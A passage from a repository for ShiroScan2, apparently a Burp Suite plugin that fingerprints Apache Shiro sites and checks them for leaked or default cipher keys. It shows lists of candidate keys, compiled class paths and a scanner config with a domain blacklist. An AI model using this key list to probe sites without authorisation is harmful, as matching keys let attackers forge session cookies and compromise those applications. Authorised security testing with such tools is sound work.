"U3BAbW5nQmxhZGUAAAAAAA==" 310 | - "ZnJlc2h6Y24xMjM0NTY3OA==" 311 | - "Jt3C93kMR9D5e8QzwfsiMw==" 312 | - "MTIzNDU2NzgxMjM0NTY3OA==" 313 | - "vXP33AonIp9bFwGl7aT7rA==" 314 | - "V2hhdCBUaGUgSGVsbAAAAA==" 315 | - "Q01TX0JGTFlLRVlfMjAxOQ==" 316 | - "Is9zJ3pzNh2cgTHB4ua3+Q==" 317 | - "SDKOLKn2J1j/2BHjeZwAoQ==" 318 | - "NsZXjXVklWPZwOfkvk6kUA==" 319 | - "GAevYnznvgNCURavBhCr1w==" 320 | - "zSyK5Kp6PZAAjlT+eeNMlg==" 321 | - "bXdrXl9eNjY2KjA3Z2otPQ==" 322 | - "RVZBTk5JR0hUTFlfV0FPVQ==" 323 | - "WkhBTkdYSUFPSEVJX0NBVA==" 324 | - "GsHaWo4m1eNbE0kNSMULhg==" 325 | - "l8cc6d2xpkT1yFtLIcLHCg==" 326 | - "KU471rVNQ6k7PQL4SqxgJg==" 327 | - "kPH+bIxk5D2deZiIxcabaA==" 328 | - "kPH+bIxk5D2deZiIxcacaA==" 329 | - "4AvVhdsgUs0F563SDFAdag==" 330 | - "FL9HL9Yu5bVUJ0PDU1ySvg==" 331 | - "fdCEiK9YvLC668sS43CJ6A==" 332 | - "FJoQCiz0z5XWz2N2LyxNww==" 333 | - "HeUZ/LvgkO7nsa18ZyVxWQ==" 334 | - "HoTP07fJPKIRLOWoVXmv+Q==" 335 | - "iycgIIyCatQofd0XXxbzEg==" 336 | - "m0/5ZZ9L4jjQXn7MREr/bw==" 337 | - 
"NoIw91X9GSiCrLCF03ZGZw==" 338 | - "oPH+bIxk5E2enZiIxcqaaA==" 339 | - "QAk0rp8sG0uJC4Ke2baYNA==" 340 | - "Rb5RN+LofDWJlzWAwsXzxg==" 341 | - "s2SE9y32PvLeYo+VGFpcKA==" 342 | - "SrpFBcVD89eTQ2icOD0TMg==" 343 | - "Us0KvVhTeasAm43KFLAeng==" 344 | - "YWJjZGRjYmFhYmNkZGNiYQ==" 345 | - "zIiHplamyXlVB11UXWol8g==" 346 | - "ZjQyMTJiNTJhZGZmYjFjMQ==" 347 | - "2adsfasdqerqerqewradsf==" 348 | - "2AvVCXsxUs0FSA7SYFjdQg==" 349 | - "2AvVhdsgERdsSA3SDFAdag==" 350 | - "2AvVhdsgUs0FSA3SaFAdfg==" 351 | - "2AvVhdsgUs0FSA3SDFAder==" 352 | - "2AvVhdsgUsOFSA3SDFAdag==" 353 | - "2AvVhmFLUs0KTA3Kprsdag==" 354 | - "2AvVidsaUSofSA3SDFAdog==" 355 | - "3Av2hmFLAs0BTA3Kprsd6E==" 356 | - "3AvVhdAgUs1FSA4SDFAdBg==" 357 | - "3AvVhMFLIs0KTA3Kprsdag==" 358 | - "3AvVhmFLUs0KTA3KaTHGFg==" 359 | - "3qDVdLawoIr1xFd6ietnsg==" 360 | - "3rvVhmFLUs0KAT3Kprsdag==" 361 | - "4AvVhm2LUs0KTA3Kprsdag==" 362 | - "4AvVhmFLUs0KTA3KAAAAAA==" 363 | - "4AvVhmFLUs0KTA3Kprseaf==" 364 | - "4AvVhmFLUs0TTA3Kprsdag==" 365 | - "4AvVhmFLUs5KTA1Kprsdag==" 366 | - "4AvVhmFLUsOKTA3Kprsdag==" 367 | - "4rvVhmFLUs0KAT3Kprsdag==" 368 | - "4WCZSJyqdUQsije93aQIRg==" 369 | - "5AvVhCsgUs0FSA3SDFAdag==" 370 | - "5oiR5piv5p2h5ZK46bG8IQ==" 371 | - "8AvVhdsgUs0FSA3SDFAdag==" 372 | - "9Ami6v2G5Y+r5aPnE4OlBB==" 373 | - "9AVvhnFLuS3KTV8KprsdAg==" 374 | - "AF05JAuyuEB1ouJQ9Y9Phg==" 375 | - "aG91c2Vob3VzZWhvdXNlMg==" 376 | - "A+kWR7o9O0/G/W6aOGesRA==" 377 | - "AztiX2RUqhc7dhOzl1Mj8Q==" 378 | - "b2EAAAAAAAAAAAAAAAAAAA==" 379 | - "B9rPF8FHhxKJZ9k63ik7kQ==" 380 | - "c2hvdWtlLXBsdXMuMjAxNg==" 381 | - "Cj6LnKZNLEowAZrdqyH/Ew==" 382 | - "duhfin37x6chw29jsne45m==" 383 | - "fCq+/xW488hMTCE+cmJ3FF==" 384 | - "FjbNm1avvGmWE9CY2HqV75==" 385 | - "GhrF5zLfq1Dtadd1jlohhA==" 386 | - "GHxH6G3LFh8Zb3NwoRgfFA==" 387 | - "HOlg7NHb9potm0n5s4ic0Q==" 388 | - "lt181dcQVz/Bo9Wb8ws/Cg==" 389 | - "M2djA70UBBUPDibGZBRvrA==" 390 | - "mIccZhQt6EBHrZIyw1FAXQ==" 391 | - "pbnA+Qzen1vjV3rNqQBLHg==" 392 | - "pyyX1c5x2f0LZZ7VKZXjKO==" 393 | - "QDFCnfkLUs0KTA3Kprsdag==" 394 | - 
"QF5HMyZAWDZYRyFnSGhTdQ==" 395 | - "qQFtSnnj/sx7vu51ixAyEQ==" 396 | - "QUxQSEFNWVNPRlRCVUlMRA==" 397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ==" 398 | - "R29yZG9uV2ViAAAAAAAAAA==" 399 | - "sBv2t3okbdm3U0r2EVcSzB==" 400 | - "sgIQrqUVxa1OZRRIK3hLZw==" 401 | - "TGMPe7lGO/Gbr38QiJu1/w==" 402 | - "w793pPq5ZVBKkj8OhV4KaQ==" 403 | - "wrjUh2ttBPQLnT4JVhriug==" 404 | - "wyLZMDifwq3sW1vhhHpgKA==" 405 | - "YnlhdnMAAAAAAAAAAAAAAA==" 406 | - "YVd4dmRtVjViM1UlM0QIdn==" 407 | - "YWdlbnRAZG1AMjAxOHN3Zg==" 408 | - "YystomRZLMUjiK0Q1+LFdw==" 409 | - "Z3VucwAAAAAAAAAAAAABBB==" 410 | - "Z3VucwACAOVAKALACAADSA==" -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.class 
-------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.class -------------------------------------------------------------------------------- /target/classes/burp/Application/ShiroFingerprintExtension/ShiroFingerprint.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ShiroFingerprint.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/CustomBurpHelpers.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomBurpHelpers.class 
-------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/CustomBurpUrl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomBurpUrl.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/CustomHelpers.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomHelpers.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/DiffPage.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/DiffPage.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/Encrypt/CbcEncrypt.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/CbcEncrypt.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/Encrypt/EncryptInterface.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/EncryptInterface.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/Encrypt/GcmEncrypt.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/GcmEncrypt.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/GlobalPassiveScanVariableReader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/GlobalPassiveScanVariableReader.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/GlobalVariableReader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/GlobalVariableReader.class -------------------------------------------------------------------------------- /target/classes/burp/Bootstrap/YamlReader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/YamlReader.class -------------------------------------------------------------------------------- /target/classes/burp/BurpExtender.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/BurpExtender.class -------------------------------------------------------------------------------- /target/classes/burp/Config.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Config.class 
-------------------------------------------------------------------------------- /target/classes/burp/ConfigDlg$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/ConfigDlg$1.class -------------------------------------------------------------------------------- /target/classes/burp/ConfigDlg.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/ConfigDlg.class -------------------------------------------------------------------------------- /target/classes/burp/CustomErrorException/DiffPageException.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomErrorException/DiffPageException.class -------------------------------------------------------------------------------- /target/classes/burp/CustomErrorException/TaskTimeoutException.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomErrorException/TaskTimeoutException.class -------------------------------------------------------------------------------- /target/classes/burp/CustomScanIssue.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomScanIssue.class -------------------------------------------------------------------------------- /target/classes/burp/Encrypt.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Encrypt.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$1.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$2.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$3.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$3.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$4.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$4.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$5.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$5.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$6.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$6.class -------------------------------------------------------------------------------- /target/classes/burp/Menu$7.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$7.class -------------------------------------------------------------------------------- /target/classes/burp/Menu.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu.class -------------------------------------------------------------------------------- /target/classes/burp/Ui/BaseSettingTag.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/BaseSettingTag.class -------------------------------------------------------------------------------- /target/classes/burp/Ui/ScanQueueTag$TablesData.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag$TablesData.class -------------------------------------------------------------------------------- /target/classes/burp/Ui/ScanQueueTag$URLTable.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag$URLTable.class -------------------------------------------------------------------------------- /target/classes/burp/Ui/ScanQueueTag.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag.class -------------------------------------------------------------------------------- /target/classes/burp/Ui/Tags.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/Tags.class -------------------------------------------------------------------------------- /target/classes/burp/Utils$SilentURLStreamHandler.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Utils$SilentURLStreamHandler.class -------------------------------------------------------------------------------- /target/classes/burp/Utils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Utils.class -------------------------------------------------------------------------------- /target/classes/config.yml: -------------------------------------------------------------------------------- 1 | # Plugin on/off switch 2 | isStart: true 3 | 4 | # Message level 5 | # Controls what is shown in the plugin's scan-queue view 6 | # ALL = show all messages 7 | # PIVOTAL = show key information only, i.e. only messages prefixed with "[+]/[-]/[x]/[*]" 8 | # Note: any unrecognised value is treated as PIVOTAL 9 | messageLevel: "PIVOTAL" 10 | 11 | # Scan configuration 12 | scan: 13 | # Number of scans per site 14 | # Once this count is exceeded the site is no longer scanned 15 | # 0 means unlimited scans 16 | siteScanNumber: 0 17 | # Domain scan rules 18 | domainName: 19 | # Domain blacklist 20 | # Note: the blacklist has the highest priority 21 | # Note: leaving it empty turns this feature off 22 | # Rules: 23 | # 1. Skip one domain: www.domain1.com 24 | # 2. Skip all subdomains of a domain: *.domain2.com 25 | # 3. 
Skip some subdomains of a domain: a.*.domain2.com/*.a.*.domain2.com 26 | # Usage: 27 | # blacklist: 28 | # - "www.domain1.com" 29 | # - "*.domain2.com" 30 | blacklist: 31 | - "*.dnslog.cn" 32 | - "*.ceye.io" 33 | - "*.fofa.so" 34 | - "*.shodan.io" 35 | - "*.github.com" 36 | - "*.fofa.info" 37 | - "*.nosec.org" 38 | # Domain whitelist 39 | # Note: the blacklist has the highest priority 40 | # Note: leaving it empty turns this feature off. NOTE(review): it is empty below, so going by this rule scanning is not confined to listed hosts; list the in-scope domains here to confine it 41 | # Rules: 42 | # 1. Scan only one domain: www.domain1.com 43 | # 2. Scan only all subdomains of a domain: *.domain2.com 44 | # 3. Scan only some subdomains of a domain: a.*.domain2.com/*.a.*.domain2.com 45 | # Usage: 46 | # whitelist: 47 | # - "www.domain1.com" 48 | # - "*.domain2.com" 49 | whitelist: 50 | 51 | # URL suffix blacklist 52 | # URLs whose suffix matches one of these entries are not tested 53 | urlBlackListSuffix: 54 | config: 55 | isStart: true 56 | suffixList: 57 | - "3g2" 58 | - "3gp" 59 | - "7z" 60 | - "aac" 61 | - "abw" 62 | - "aif" 63 | - "aifc" 64 | - "aiff" 65 | - "arc" 66 | - "au" 67 | - "avi" 68 | - "azw" 69 | - "bin" 70 | - "bmp" 71 | - "bz" 72 | - "bz2" 73 | - "cmx" 74 | - "cod" 75 | - "csh" 76 | - "css" 77 | - "csv" 78 | - "doc" 79 | - "docx" 80 | - "eot" 81 | - "epub" 82 | - "gif" 83 | - "gz" 84 | - "ico" 85 | - "ics" 86 | - "ief" 87 | - "jar" 88 | - "jfif" 89 | - "jpe" 90 | - "jpeg" 91 | - "jpg" 92 | - "m3u" 93 | - "mid" 94 | - "midi" 95 | - "mjs" 96 | - "mp2" 97 | - "mp3" 98 | - "mpa" 99 | - "mpe" 100 | - "mpeg" 101 | - "mpg" 102 | - "mpkg" 103 | - "mpp" 104 | - "mpv2" 105 | - "odp" 106 | - "ods" 107 | - "odt" 108 | - "oga" 109 | - "ogv" 110 | - "ogx" 111 | - "otf" 112 | - "pbm" 113 | - "pdf" 114 | - "pgm" 115 | - "png" 116 | - "pnm" 117 | - "ppm" 118 | - "ppt" 119 | - "pptx" 120 | - "ra" 121 | - "ram" 122 | - "rar" 123 | - "ras" 124 | - "rgb" 125 | - "rmi" 126 | - "rtf" 127 | - "snd" 128 | - "svg" 129 | - "swf" 130 | - "tar" 131 | - "tif" 132 | - "tiff" 133 | - "ttf" 134 | - "vsd" 135 | - "wav" 136 | - "weba" 137 | - "webm" 138 | - "webp" 139 | - "woff" 140 | - "woff2" 141 | - "xbm" 142 | - "xls" 143 | - "xlsx" 144 | - "xpm" 145 | - "xul" 146 | - "xwd" 147 | - "zip" 148 | - "js" 149 | - "wmv" 150 | - "asf" 151 
| - "asx" 152 | - "rm" 153 | - "rmvb" 154 | - "mp4" 155 | - "mov" 156 | - "m4v" 157 | - "dat" 158 | - "mkv" 159 | - "flv" 160 | - "vob" 161 | - "txt" 162 | - "php" 163 | - "asp" 164 | 165 | # Application configuration 166 | application: 167 | # Shiro fingerprint extension 168 | shiroFingerprintExtension: 169 | config: 170 | # Number of Shiro fingerprint issues 171 | # How many issues may be accepted for the same site 172 | # Once this count is exceeded the site is no longer scanned 173 | # 0 means unlimited 174 | issueNumber: 3 175 | # Issue name 176 | issueName: "ShiroFramework" 177 | # Shiro cipher-key extension 178 | shiroCipherKeyExtension: 179 | config: 180 | # Plugin on/off switch 181 | isStart: true 182 | # Whether to scan for the issue with CBC encryption 183 | isScanCbcEncrypt: true 184 | # Whether to scan for the issue with GCM encryption 185 | isScanGcmEncrypt: true 186 | # Number of Shiro cipher-key leak issues 187 | # How many issues may be accepted for the same site 188 | # Once this count is exceeded the site is no longer scanned 189 | # 0 means unlimited 190 | issueNumber: 1 191 | # Maximum total number of threads the program runs 192 | # The minimum is 1; a value less than or equal to 0 is reset to 1 193 | # Note: 194 | # Threads are started dynamically according to the total number of Shiro cipher keys supplied 195 | # A value of 4 means that at most that many threads may be started to run the task 196 | threadTotal: 4 197 | # Similarity ratio 198 | # 1 = 100%, 0.7 = 70% 199 | # Used when comparing the Shiro key-testing request with the original request and with a request whose key is certain to be wrong: the similarity below which the issue is considered absent 200 | # For example: 201 | # if the similarity between the key-testing request and the original request is below 0.7, the issue is considered absent 202 | # if the similarity between the key-testing request and the certainly-wrong-key request is below 0.7, the issue is considered absent 203 | similarityRatio: 0.7 204 | # Provider 205 | # Declares which class under Application.ShiroCipherKeyExtension.ExtensionMethod serves this extension 206 | provider: "ShiroCipherKeyScan" 207 | # Issue name 208 | issueName: "ShiroCipherKey" 209 | payloads: # NOTE(review): presumably the candidate cipher keys this extension tries; the first entry is the key older Apache Shiro releases shipped as a built-in default, and an application whose Shiro cipher key matches any entry should replace it with a randomly generated one 210 | - "kPH+bIxk5D2deZiIxcaaaA==" 211 | - "Z3VucwAAAAAAAAAAAAAAAA==" 212 | - "wGiHplamyXlVB11UXWol8g==" 213 | - "2AvVhdsgUs0FSA3SDFAdag==" 214 | - "3AvVhmFLUs0KTA3Kprsdag==" 215 | - "4AvVhmFLUs0KTA3Kprsdag==" 216 | - "bWljcm9zAAAAAAAAAAAAAA==" 217 | - "WcfHGU25gNnTxTlmJMeSpw==" 218 | - "fCq+/xW488hMTCD+cmJ3aQ==" 219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN" 220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA==" 221 | - "1QWLxg+NYmxraMoxAXu/Iw==" 222 | - "a2VlcE9uR29pbmdBbmRGaQ==" 223 | - "5aaC5qKm5oqA5pyvAAAAAA==" 224 | - "1AvVhdsgUs0FSA3SDFAdag==" 225 | - "5RC7uBZLkByfFfJm22q/Zw==" 226 | - "3AvVhdAgUs0FSA4SDFAdBg==" 227 | - "a3dvbmcAAAAAAAAAAAAAAA==" 228 
| - "eXNmAAAAAAAAAAAAAAAAAA==" 229 | - "U0hGX2d1bnMAAAAAAAAAAA==" 230 | - "Ymx1ZXdoYWxlAAAAAAAAAA==" 231 | - "L7RioUULEFhRyxM7a2R/Yg==" 232 | - "UGlzMjAxNiVLeUVlXiEjLw==" 233 | - "bWluZS1hc3NldC1rZXk6QQ==" 234 | - "ZUdsaGJuSmxibVI2ZHc9PQ==" 235 | - "7AvVhmFLUs0KTA3Kprsdag==" 236 | - "MTIzNDU2Nzg5MGFiY2RlZg==" 237 | - "OY//C4rhfwNxCQAQCrQQ1Q==" 238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ" 239 | - "FP7qKJzdJOGkzoQzo2wTmA==" 240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3" 241 | - "LEGEND-CAMPUS-CIPHERKEY==" 242 | - "r0e3c16IdVkouZgk1TKVMg==" 243 | - "ZWvohmPdUsAWT3=KpPqda" 244 | - "k3+XHEg6D8tb2mGm7VJ3nQ==" 245 | - "U3ByaW5nQmxhZGUAAAAAAA==" 246 | - "tiVV6g3uZBGfgshesAQbjA==" 247 | - "ZAvph3dsQs0FSL3SDFAdag==" 248 | - "0AvVhmFLUs0KTA3Kprsdag==" 249 | - "25BsmdYwjnfcWmnhAciDDg==" 250 | - "3JvYhmBLUs0ETA5Kprsdag==" 251 | - "5AvVhmFLUs0KTA3Kprsdag==" 252 | - "6AvVhmFLUs0KTA3Kprsdag==" 253 | - "6NfXkC7YVCV5DASIrEm1Rg==" 254 | - "cmVtZW1iZXJNZQAAAAAAAA==" 255 | - "8AvVhmFLUs0KTA3Kprsdag==" 256 | - "8BvVhmFLUs0KTA3Kprsdag==" 257 | - "9AvVhmFLUs0KTA3Kprsdag==" 258 | - "OUHYQzxQ/W9e/UjiAGu6rg==" 259 | - "aU1pcmFjbGVpTWlyYWNsZQ==" 260 | - "bXRvbnMAAAAAAAAAAAAAAA==" 261 | - "5J7bIJIV0LQSN3c9LPitBQ==" 262 | - "bya2HkYo57u6fWh5theAWw==" 263 | - "f/SY5TIve5WWzT4aQlABJA==" 264 | - "WuB+y2gcHRnY2Lg9+Aqmqg==" 265 | - "3qDVdLawoIr1xFd6ietnwg==" 266 | - "YI1+nBV//m7ELrIyDHm6DQ==" 267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA==" 268 | - "2A2V+RFLUs+eTA3Kpr+dag==" 269 | - "6ZmI6I2j3Y+R1aSn5BOlAA==" 270 | - "SkZpbmFsQmxhZGUAAAAAAA==" 271 | - "2cVtiE83c4lIrELJwKGJUw==" 272 | - "fsHspZw/92PrS3XrPW+vxw==" 273 | - "XTx6CKLo/SdSgub+OPHSrw==" 274 | - "sHdIjUN6tzhl8xZMG3ULCQ==" 275 | - "O4pdf+7e+mZe8NyxMTPJmQ==" 276 | - "HWrBltGvEZc14h9VpMvZWw==" 277 | - "rPNqM6uKFCyaL10AK51UkQ==" 278 | - "Y1JxNSPXVwMkyvES/kJGeQ==" 279 | - "lT2UvDUmQwewm6mMoiw4Ig==" 280 | - "MPdCMZ9urzEA50JDlDYYDg==" 281 | - "xVmmoltfpb8tTceuT5R7Bw==" 282 | - "c+3hFGPjbgzGdrC+MHgoRQ==" 283 | - "ClLk69oNcA3m+s0jIMIkpg==" 284 | - 
